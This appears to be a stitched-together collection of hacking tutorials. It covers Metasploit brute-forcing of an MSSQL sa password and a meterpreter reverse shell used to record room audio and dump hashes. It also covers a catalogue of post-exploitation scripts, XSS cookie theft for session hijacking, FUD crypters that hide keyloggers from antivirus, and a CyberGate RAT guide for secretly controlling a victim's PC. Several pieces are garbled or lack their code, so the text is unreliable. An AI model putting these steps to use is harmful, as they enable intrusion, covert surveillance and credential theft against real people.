How to Hack Databases: Cracking SQL Server Passwords & Owning the Server
In this tutorial, we'll look at how we can crack the password on the system admin (sa) account on the database, install a meterpreter payload through calling the stored procedure xp_cmdshell, and wreak havoc on their system.
Step 1: Start Metasploit
First, we need to start Metasploit.
Once we have the metasploit command prompt, we need to define which module we want to use. In past Metasploit tutorials, we've always used exploits, but this one is a bit different. Instead, we will use a scanner among the auxiliary modules that enables us to brute force the sa password. Let's load up mssql_login:
use scanner/mssql/mssql_login
As
you can see, Metasploit responds by telling us we have successfully
loaded this auxiliary
module. Now let's take a look at the options with
this module.
show options
Step 2: Set Your Options
In order to run this MS SQL login module, we will need:
A password file,
Set the RHOSTS, and
Determine the number of THREADS we want to run.
BackTrack has a wordlist specially built for MS SQL password hacking with over 57,000 commonly used SQL passwords at /pentest/exploits/fasttrack/bin/wordlist.txt. In this case, our target is at 192.168.1.103, and we will set our THREADS to 20.
Step 3: Brute Force the Database Passwords
Now, we simply need to type exploit and it runs through password list until it finds the password for the sa account.
exploit
As
you can see, after testing over 57,000 passwords (it takes a few
minutes, so be patient), it found the password on our sa account of
"NullByte". Success! Now we have full sysadmin privileges on the database that we can hopefully convert to full system sysadmin privileges.
Step 4: Grab the xp__cmdshell
Now that we have
full sysadmin (sa) on the MS SQL database, we are going to leverage that to full system sysadmin privileges. MS SQL Server has a stored
procedure named xp_cmdshell that enables the sa account
to gain a system command shell with full system admin rights. If we can
invoke that command shell, we may be able to load the payload of our
choice on the system and own that system.
Metasploit has a exploit module named windows/mssql/mssqlpayload that attempts to do this. Let's load it.
use windows/mssql/mssql_payload
Now, let's check the options for this exploit:
show options
In this case, we will try to load the meterpreter on this system, so let's:
set PAYLOAD windows/meterpreter/reverse_tcp
In
addition, we need to set the LPORT, the LHOST, the RHOST and the
password we recovered from the sa account from above, in this case,
"NullByte".
Now, simply type exploit and if all is right with the world, we should get a meterpreter prompt.
Success! We have a meterpreter session!
Step 5: Wreak Havoc!
Now that we have the meterpreter on this system thanks to the xp_cmdshell stored procedure, we can begin to wreak havoc on this system. Take a look at my list of meterpreter scripts and let's try a few.
First,
let's turn on the microphone and listen in on the conversations of the
sysadmin and anyone else in the room. Think of it as installing a bug in
the room from the old James Bond 007 movies.
meterpreter > run sound_recorder -i 100 -l /etc
This will grab 100 segments of audio of 30 seconds, or about 50 minutes, and save it in the /etcdirectory. Of course, we can record as much audio as we want. We are only limited by hard drive space.
Step 6: Grab the Hash
Now, let's grab some
passwords so that we can log back back in whenever we please. Remember,
once we have the admin password, we can login any time with Metasploit's psexec exploit.
meterpreter > hashdump
As you can see, we were able to grab the password hashes from the system
.
How to Crack User Passwords in a Linux System In this article, we'll look at how to grab the password
hashes from a Linux system and crack the hashes using probably the most
widely used password cracking tool out there, John the Ripper.
Let's boot up BackTrack and get hacking!
Where Linux Passwords Are Stored
Linux passwords are stored in the /etc/passwd file in cleartext in older systems and in /etc/shadow
file in hash form on newer systems. We should expect that the passwords
on anything other than old legacy systems to be stored in /etc/shadow.
Step 1: Create Some User Accounts
Since our
BackTrack system probably doesn't have many users on it other than our
root account, let's go ahead and create a couple more accounts.
Let's create user1 with password "flower" and user2 with a password of "hacker".
I've
purposely chosen dictionary words as the complexity of the password is
inversely related to the time necessary to crack it. One of the nice
features of John the Ripper is that it will try to use a dictionary
attack first. If that fails, it will try a hybrid attack. And only if
that fails will it attempt a brute-force attack, which is the most time
consuming.
Step 2: Open John the Ripper
Now that we have a
couple of regular users in our system with simple passwords, we now need to open John the Ripper. John the Ripper is a simple, but powerful
password cracker without a GUI (this helps to make it faster as GUIs
consume resources).
We can access it from BackTrack by going to the BackTrack button on the bottom left, then Backtrack, Privilege Escalation, Password Attacks, Offline Attacks, and finally select John the Ripper from the multiple password cracking tools available.
If you selected the correct menu item, it will open a terminal that looks like this.
By the way, feel free to close our previous terminal as we're finished with it.
Step 3: Test John the Ripper
At the prompt, type:
bt > john -test
This
command will send John the Ripper through a variety of benchmark tests
to estimate how long it will take to break the passwords on your system.
Your terminal will look something like this.
Now
that John has estimated how long each of the encryption schemes will
take to crack, let's put him to work on cracking our passwords.
Step 4: Copy the Password Files to Our Current Directory
Linux stores its passwords in /etc/shadow, so what we want to do is copy this file to our current directory along with the /etc/passwd file, then "unshadow" them and store them in file we'll call passwords. So, let's type both:
bt > cp /etc/shadow ./
bt > cp /etc/passwd ./
In Linux, the cp command means copy and the ./
represents our current directory. So this command says, copy the
contents of /etc/shadow to my current directory. We do the same for the
/etc/ passwd file.
Step 5: Unshadow
Next we need to combine the information in the /etc/shadow and the /etc/passwd files, so that John can do its magic.
bt > ./unshadow passwd shadow > passwords
Step 6: Crack!
Now that we have unshadowed the critical files, we can simply let John run on our password file.
bt > john passwords
John
the Ripper will proceed to attempt to crack your passwords. As you can
see, it cracked
all three of ours in a matter of seconds! Of course,
more complex passwords will take significantly
more time, but all we
need is just one user with a simple password and we have access to the
account in seconds.
It's
also important to note that any password cracker is only as good as its
word list. For more c
omplex or hybrid passwords, you probably want to
use a password list containing far more
passwords, including hybrid
passwords such "p@$$w0rd" that combine special characters into
words.
We'll
be doing more password cracking among numerous other hacks, so keep
coming back!
And if you have any questions, feel free to comment below
Please note that new meterpreter scripts are being developed
every day. This list attempts to provide you with a complete list of
scripts as of this writing. If you find errors or typos, please feel
free to post them here, so I will try correct them as soon as humanly
possible.
Script Commands with Brief Descriptions
arp_scanner.rb - Script for performing an ARP's Scan Discovery.
autoroute.rb - Meterpreter session without having to background the current session.
checkvm.rb - Script for detecting if target host is a virtual machine.
credcollect.rb - Script to harvest credentials found on the host and store them in the database.
domain_list_gen.rb - Script for extracting domain admin account list for use.
dumplinks.rb
- Dumplinks parses .lnk files from a user's recent documents folder and
Microsoft Office's Recent documents folder, if present. The .lnk files
contain time stamps, file locations, including share names, volume
serial #s and more. This info may help you target additional systems.
duplicate.rb
- Uses a meterpreter session to spawn a new meterpreter session in a
different process. A new process allows the session to take "risky"
actions that might get the process killed by A/V, giving a meterpreter
session to another controller, or start a keylogger on another process.
enum_chrome.rb - Script to extract data from a chrome installation.
enum_firefox.rb - Script for extracting data from Firefox. enum_logged_on_users.rb - Script for enumerating current logged users and users that have logged in to the system. enum_powershell_env.rb - Enumerates PowerShell and WSH configurations.
enum_putty.rb - Enumerates Putty connections.
enum_shares.rb - Script for Enumerating shares offered and history of mounted shares.
enum_vmware.rb - Enumerates VMware configurations for VMware products.
event_manager.rb - Show information about Event Logs on the target system and their configuration.
file_collector.rb - Script for searching and downloading files that match a specific pattern.
get_application_list.rb - Script for extracting a list of installed applications and their version.
getcountermeasure.rb
- Script for detecting AV, HIPS, Third Party Firewalls, DEP
Configuration and Windows Firewall configuration. Provides also the
option to kill the processes of detected products and disable the
built-in firewall.
get_env.rb - Script for extracting a list of all System and User environment variables.
getfilezillacreds.rb - Script for extracting servers and credentials from Filezilla.
getgui.rb - Script to enable Windows RDP.
get_local_subnets.rb - Get a list of local subnets based on the host's routes.
get_pidgen_creds.rb - Script for extracting configured services with username and passwords.
gettelnet.rb - Checks to see whether telnet is installed.
get_valid_community.rb - Gets a valid community string from SNMP.
getvncpw.rb - Gets the VNC password.
hashdump.rb - Grabs password hashes from the SAM.
hostedit.rb - Script for adding entries in to the Windows Hosts file.
keylogrecorder.rb - Script for running keylogger and saving all the keystrokes.
killav.rb - Terminates nearly every antivirus software on victim.
metsvc.rb - Delete one meterpreter service and start another.
migrate - Moves the meterpreter service to another process.
multicommand.rb - Script for running multiple commands on Windows 2003, Windows Vistaand Windows XP and Windows 2008 targets.
multi_console_command.rb - Script for running multiple console commands on a meterpreter session.
multi_meter_inject.rb
- Script for injecting a reverce tcp Meterpreter Payload into memory of
multiple PIDs, if none is provided a notepad process will be created
and a Meterpreter Payload will be injected in to each.
multiscript.rb - Script for running multiple scripts on a Meterpreter session.
netenum.rb - Script for ping sweeps on Windows 2003, Windows Vista, Windows 2008 and Windows XP targets using native Windows commands.
packetrecorder.rb - Script for capturing packets in to a PCAP file.
panda2007pavsrv51.rb
- This module exploits a privilege escalation vulnerability in Panda
Antivirus 2007. Due to insecure permission issues, a local attacker can
gain elevated privileges.
persistence.rb - Script for creating a persistent backdoor on a target host.
pml_driver_config.rb
- Exploits a privilege escalation vulnerability in Hewlett-Packard's
PML Driver HPZ12. Due to an insecure SERVICE_CHANGE_CONFIG DACL
permission, a local attacker can gain elevated privileges.
powerdump.rb
- Meterpreter script for utilizing purely PowerShell to extract
username and password hashes through registry keys. This script requires
you to be running as system in order to work properly. This has
currently been tested on Server 2008 and Windows 7, which installs
PowerShell by default.
prefetchtool.rb - Script for extracting information from windows prefetch folder.
process_memdump.rb - Script is based on the paper Neurosurgery With Meterpreter.
remotewinenum.rb
- This script will enumerate windows hosts in the target environment
given a username and password or using the credential under which
Meterpeter is running using WMI wmic windows native tool.
scheduleme.rb
- Script for automating the most common scheduling tasks during a
pentest. This script works with Windows XP, Windows 2003, Windows Vista
and Windows 2008.
schelevator.rb - Exploit for
Windows Vista/7/2008 Task Scheduler 2.0 Privilege Escalation. This
script exploits the Task Scheduler 2.0 XML 0day exploited by Stuxnet.
schtasksabuse.rb
- Meterpreter script for abusing the scheduler service in Windows by
scheduling and running a list of command against one or more targets.
Using schtasks command to run them as system. This script works with
Windows XP, Windows 2003, Windows Vista and Windows 2008.
scraper.rb - The goal of this script is to obtain system information from a victim through an existing Meterpreter session.
screenspy.rb - This script will open an interactive view of remote hosts. You will need Firefox installed on your machine.
screen_unlock.rb - Script to unlock a windows screen. Needs system privileges to run and known signatures for the target system.
screen_dwld.rb - Script that recursively search and download files matching a given pattern.
service_manager.rb - Script for managing Windows services.
service_permissions_escalate.rb
This script attempts to create a service, then searches through a list
of existing services to look for insecure file or configuration
permissions that will let it replace the executable with a payload. It
will then attempt to restart the replaced service to run the payload. If
that fails, the next time the service is started (such as on reboot)
the attacker will gain elevated privileges.
sound_recorder.rb - Script for recording in intervals the sound capture by a target host microphone.
srt_webdrive_priv.rb - Exploits a privilege escalation vulnerability in South River Technologies WebDrive.
uploadexec.rb - Script to upload executable file to host.
virtualbox_sysenter_dos - Script to DoS Virtual Box.
virusscan_bypass.rb - Script that kills Mcafee VirusScan Enterprise v8.7.0i+ processes.
vnc.rb - Meterpreter script for obtaining a quick VNC session.
webcam.rb - Script to enable and capture images from the host webcam.
win32-sshclient.rb - Script to deploy & run the "plink" commandline ssh-client. Supports only MS-Windows-2k/XP/Vista Hosts.
win32-sshserver.rb - Script to deploy and run OpenSSH on the target machine.
winbf.rb
- Function for checking the password policy of current system. This
policy may resemble the policy of other servers in the target
environment.
winenum.rb - Enumerates Windows system including environment variables, network interfaces, routing, user accounts, etc
wmic.rb - Script for running WMIC commands on Windows 2003, Windows Vista and Windows XP and Windows 2008 targets.
Here we show how you can hack a session using javascript and php.
What is a cookie? A cookie known as a web cookie or http cookie is a small piece of text stored by the user browser.A cookie is sent as an header by the web server to the web browser on the client side.A cookie is static and is sent back by the browser unchanged everytime it accesses the server. A cookie has a expiration time that is set by the server and are deleted automatically after the expiration time. Cookie is used to maintain users authentication and to implement shopping cart during his navigation, possibly across multiple visits. What can we do after stealing cookie? Well,as we know web sites authenticate their user's with a cookie,it can be used to hijack the victims session. The victims stolen cookie can be replaced with our cookie to hijack his session. This is a cookie stealing script that steals the cookies of a user and store them in a text file, these cookied can later be utilised.
Save the script as a cookielogger.php on your server. (You can get any free webhosting easily such as justfree,x10hosting etc..) Create an empty text file log.txt in the same directory on the webserver. The hijacked/hacked cookies will be automatically stored here. Now for the hack to work we have to inject this piece of javascript into the target's page. This can be done by adding a link in the comments page which allows users to add hyperlinks etc. But beware some sites dont allow javascript so you gotta be lucky to try this. The best way is to look for user interactive sites which contain comments or forums. Post the following code which invokes or activates the cookielogger on your host. Code:
<img src="URL OF THE IMAGE"/></a> All the details like cookie,ipaddress,browser of the victim are logged in to log.txt on your hostserver In the above codes please remove the space in between javascript. Hijacking the Session: Now we have cookie,what to do with this..? Download cookie editor mozilla plugin or you may find other plugins as well. Go to the target site open cookie editor Replace the cookie with the stolen cookie of the victim and refresh the page.Thats it!!! you should now be in his account. Download cookie editor mozilla plugin from here : https://addons.mozilla.org/en-US/firefox/addon/573 Don't forget to comment if you like my post.
Fern wifi Cracker- A Wireless Penetration Testing Tool
WiFi is now become the way for short distance Internet, for long distance we have WiMAX standard but WiFi is very important because you can find WiFi hot-spot everywhere like at the airport, coffee shop and at the educational places. There are so many people out there who are using WiFi at there home and at offices. Cracking a WiFi connection is a essential part of wardriving but for penetration tester and a ethical hacker WiFi or wireless network security is an important part.
If you are doing a job as a IT security engineer and your task is to do a pen test on the wifi network. What tools are you going to use?
Operating system for this case is usually Linux or specially Ubuntu or backtrack, backtrack 5 contain different tools for WiFi cracking like aircrack-ng but in this article I will discuss something about Fern WiFi Cracker.
What Is Fern WiFi Cracker ?
Fern wifi cracker is a wireless security auditing application that is written in python and uses python-qt4. This application uses the aircrack-ng suite of tools. It can be run on any linux distribution like Fern wifi cracker is use in ubuntu or even you can use fern wifi cracker in windows but you must have some dependencies to run fern wifi cracker on windows.
Click the refresh button to display monitor interfaces:
Please Note, the scan button is a dual button, meaning, by clicking it the first time it scans for networks,then by clicking the button again, it stops any scan that was initialized (vise versa).
Fern wifi is a GUI and it can crack WEP and WPA as well.
please leave comments and like my facebook page if u like this tutorial it took lots of time to write this article
Hacking an Gmail,Yahoo,Hotmail emails using Google
To get success remeber this rule of hash technique TRY,Try and try :D
HELLO GUYS today i will show u how to hack any gmail yahoo etc accounts very easily. I have seen the those people who want to hack someones email accounts spend their lots of time on searching but found nothing.Most of noob hackers try to hack someone with phishing attack.But today i am going to show you a very new method which is called hash technique. So lets just begin
1. open www.google.com 2. now paste this code in the search bar and hit enter
4, After clicking you will se these hashes along with the emails
5. copy any hash code Eg( 127359f404a2b735de9ba1336c66f480) and go to http://www.md5decrypter.co.uk/ paste the hash code and click descrypt hash After 2-3 seconds it will
give u the password if found.
Some emails wont work they hve changed their passwords or the hash code result is null
I hope that u will enjoy this tutorial thanks and like us on facebook
100% FUD Crypters for Keyloggers and RATs So now i will teach u guys how to make ur keyloggers and rats Undetectable by antivirus so lets just begin
What are Crypters and what is FUD??? Well, I won't extend this topic over here, as I have explained all things about crypters in my article FUD crypter basics. Once, you have gone through that article, move on to further steps. How to use FUD crypter??? i have tried this Fud crypter and found it working perfectly and i hope it will work well for u aswell 1. DownloadFUD Cryptersoftware to bypass antivirus. 2. Run crypter on your computer to see:
3. Hit on Browse and select the Decay logger server you have created. Again, hit on second Browse button and select the msc2.exe stub file fromdownloaded folder. Select type of encryption like Xor, Rsa, etc. as you want. Now, hit on Crypt and select the path where you want to save the crypted FUD server.
4. You will find the crypted FUD server created at required destination. Now, bind this crypted keylogger server with any .exe fileusing Iexpress Bindersoftware and send it to your victim to get the required email passwords from victim computer. You don't have to worry about victim antivirus as the crypted server will not be detected by any antivirus. I have posted the scan results below: Scan result before crypting:
Scan result after Crypting:
Note: Since this crypter is public, it will remain FUD for not more than 2-3 days. So, use this crypter the earliest. The best way is to get the best hacking software - Winspy Keylogger, which is FUD (Fully UnDetectable). This is personally recommended keylogger from HackersAuthority So friends, try out this FUD crypter to bypass antivirus detection.This crypter supports many keyloggers and RATs. You can try out for your own server.
\CYBERGATE TUTORIAL STEP BY STEP
Hello guys today i will show u how to hack someonez pc with cybergate so lets just begin
FOLLOW THESE STEPS CAREFULLY
1. Download cybergate mediafire link
2.Install it
3. after installation put this password: cybergate
4. 4)Once you have put the password, Click on Login. You will get the message CyberGate Station is now unlocked and fully functional. 5)After that Click on control Center ==>Start
6. it will ask for the port no type any port number from 0 to 65535 But remember don't assign well known Ports like 80,21 etc..
6) Once You have Assign the Port Number ,Go to Control Center ==>Builder==>Create Server
7. Now click add
8.Now you need to add your ip address and the Port number you have add before.
Eg: 192.168.1.1:999 To get You IP address go to Run==>cmd==>>ipconfig Like This
one you get the ip and port number go to installation tab
Here you will get Different Option. =>Installation Directory : Now Select any one option. where you want to infect your trojan in your Friends computer . =>Boot: Select Registry option also . Always Select the Random keys for Active Setup and Mutex. => Inject Into: Mostly Select the Default Browser.
9)Now go to Message Tab:
10)Now go to Keylogger Tab:
11)Now Directly Create Server:
Click on Create Server and Save you File ..
After that just give this file to your Friend and when he click on that File you will get the access of his system. You can download his files at your End.If the Person is having the Webcam you can access it..That's you are Having the Total Control of his System.Hope U Like it